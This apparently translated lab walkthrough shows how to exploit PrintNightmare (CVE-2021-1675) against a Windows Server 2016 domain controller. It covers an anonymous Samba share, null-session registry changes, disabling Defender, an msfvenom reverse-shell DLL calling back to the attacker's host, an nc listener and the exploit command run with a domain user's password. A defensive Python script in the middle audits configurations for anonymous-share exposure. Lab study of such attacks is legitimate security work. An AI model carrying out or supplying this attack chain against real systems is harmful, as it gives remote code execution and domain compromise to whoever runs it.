I. Environment setup
Windows Server 2016 domain environment (Windows Defender turned off)
ip1: 192.168.110.184
ip2: 192.168.13.135
kali (with an anonymous Samba share enabled)
ip1: 192.168.110.129
One domain user account
II. Setting up Samba and enabling an anonymous share
ps: Samba cannot be set up on a public-internet host; ISPs appear to have blocked port 445 because of EternalBlue.
On Linux (ships with kali):
apt-get install samba samba-common
vim /etc/samba/smb.conf
Then change the configuration file to the following:
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes
Restart Samba:
service smbd restart
ps: "path" is the path of the shared folder.
On Windows (I did not get this to work):
mkdir C:\share
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
(run in PowerShell; not suitable for Win7)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
(this overwrites any existing NullSessionPipes value)
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
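The two configurations above (the Samba smb.conf and the Windows null-session registry values) are exactly what a defender wants to find before an attacker does. The following script is an added example, not part of the original post: it parses an smb.conf and a regedit .reg export and reports every setting that grants unauthenticated access to a share. Both inputs are constructed samples embedded inline (the share names, paths and a control share named "docs" are assumptions for the demo), so it runs offline.

```python
"""Audit anonymous-share exposure in a Samba smb.conf and in a Windows .reg export."""
import configparser
import re

# Constructed sample smb.conf mirroring the share layout discussed above,
# plus a non-guest share ("docs") as a control case. Not a real host's file.
SAMPLE_SMB_CONF = """
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /usr/share2
guest ok = yes
read only = no
browsable = yes

[docs]
path = /srv/docs
guest ok = no
read only = yes
"""

# Constructed regedit export of the keys touched by the REG ADD commands above.
# hex(7) is how regedit serialises REG_MULTI_SZ: comma-separated UTF-16LE bytes.
SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters]
"NullSessionPipes"=hex(7):73,00,72,00,76,00,73,00,76,00,63,00,00,00,00,00
"NullSessionShares"=hex(7):73,00,68,00,61,00,72,00,65,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"EveryoneIncludesAnonymous"=dword:00000001
"RestrictAnonymous"=dword:00000000
"""

LANMAN = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters".lower()
LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa".lower()


def _truthy(value: str) -> bool:
    """Samba boolean: yes/true/1 are true, anything else false."""
    return value.strip().lower() in ("yes", "true", "1")


def parse_smb_conf(text: str) -> dict:
    """Return {section: {normalised_option: value}}; Samba ignores case and spaces in option names."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = lambda opt: re.sub(r"\s+", "", opt).lower()
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}


def audit_smb_conf(text: str) -> list:
    """Flag settings that let unauthenticated (guest) clients reach a share."""
    conf = parse_smb_conf(text)
    findings = []
    map_guest = conf.get("global", {}).get("maptoguest", "never").strip().lower()
    if map_guest != "never":
        findings.append(f"global: 'map to guest = {map_guest}' turns failed logins into guest sessions")
    for share, opts in conf.items():
        if share == "global" or not _truthy(opts.get("guestok", opts.get("public", "no"))):
            continue
        if "writable" in opts or "writeable" in opts:  # Samba inverses of 'read only'
            writable = _truthy(opts.get("writable", opts.get("writeable", "no")))
        else:
            writable = not _truthy(opts.get("readonly", "yes"))
        mode = "read/write" if writable else "read-only"
        findings.append(f"[{share}] path={opts.get('path', '?')}: anonymous {mode} access (guest ok = yes)")
    return findings


def parse_reg_export(text: str) -> dict:
    """Return {(key_path_lowercase, value_name): value} for dword, string and hex(7) entries."""
    joined = re.sub(r"\\\r?\n\s*", "", text)  # regedit wraps long hex values with a trailing backslash
    values, key = {}, None
    for line in joined.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            key = m.group(1).lower()
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m or key is None:
            continue
        name, raw = m.group(1), m.group(2)
        if raw.startswith("dword:"):
            values[(key, name)] = int(raw[6:], 16)
        elif raw.startswith("hex(7):"):  # REG_MULTI_SZ: null-separated UTF-16LE strings
            data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
            values[(key, name)] = [s for s in data.decode("utf-16-le").split("\x00") if s]
        elif raw.startswith('"') and raw.endswith('"'):
            values[(key, name)] = raw[1:-1]
    return values


def audit_null_session(text: str) -> list:
    """Flag registry values that let null (unauthenticated) sessions reach shares."""
    reg = parse_reg_export(text)
    findings = []
    if reg.get((LSA, "RestrictAnonymous"), 0) == 0:  # absent means the default of 0
        findings.append("Lsa\\RestrictAnonymous = 0: anonymous enumeration is not restricted")
    if reg.get((LSA, "EveryoneIncludesAnonymous"), 0) == 1:
        findings.append("Lsa\\EveryoneIncludesAnonymous = 1: anonymous users get Everyone's permissions")
    shares = reg.get((LANMAN, "NullSessionShares"), [])
    if shares:
        findings.append("NullSessionShares reachable without credentials: " + ", ".join(shares))
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF) + audit_null_session(SAMPLE_REG_EXPORT):
        print(finding)
```

On the sample inputs it reports the guest-writable "smb" share (the condition that lets an unauthenticated client drop a file on the share), the "map to guest" setting, and the three registry values that open null sessions; the "docs" share, which requires authentication, is not reported. Run it against a real smb.conf or a `reg export` of those two keys to get the same verdict for a host you manage.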
III. Installing the author's impacket package on kali
Exploit URL: https://github.com/cube0x0/CVE-2021-1675
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
IV. Turning off Windows Defender on Windows Server 2016
See: https://blog.csdn.net/weixin_43140049/article/details/106080625
V. Generating the malicious DLL on kali and placing it in the shared folder
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f dll -o /usr/share2/shell.dll
VI. Starting a listener on kali
Note: do not use a handler listener here; use nc (the exact reason is unknown).
nc -lnvp 4444
VII. Running the exploit
python3 CVE-2021-1675.py test.com/testadmin:qazWSX123@192.168.110.184 '\\192.168.110.129\smb\shell.dll'
VIII. Notes
1. I opened an anonymous share on Windows using the method above, but the exploit failed.
2. Since the VPS could not open port 445, I forwarded a different port on a Linux machine to port 445 on the internal network; the exploit failed in that case as well.
3. This exploit failed on Windows Server 2012.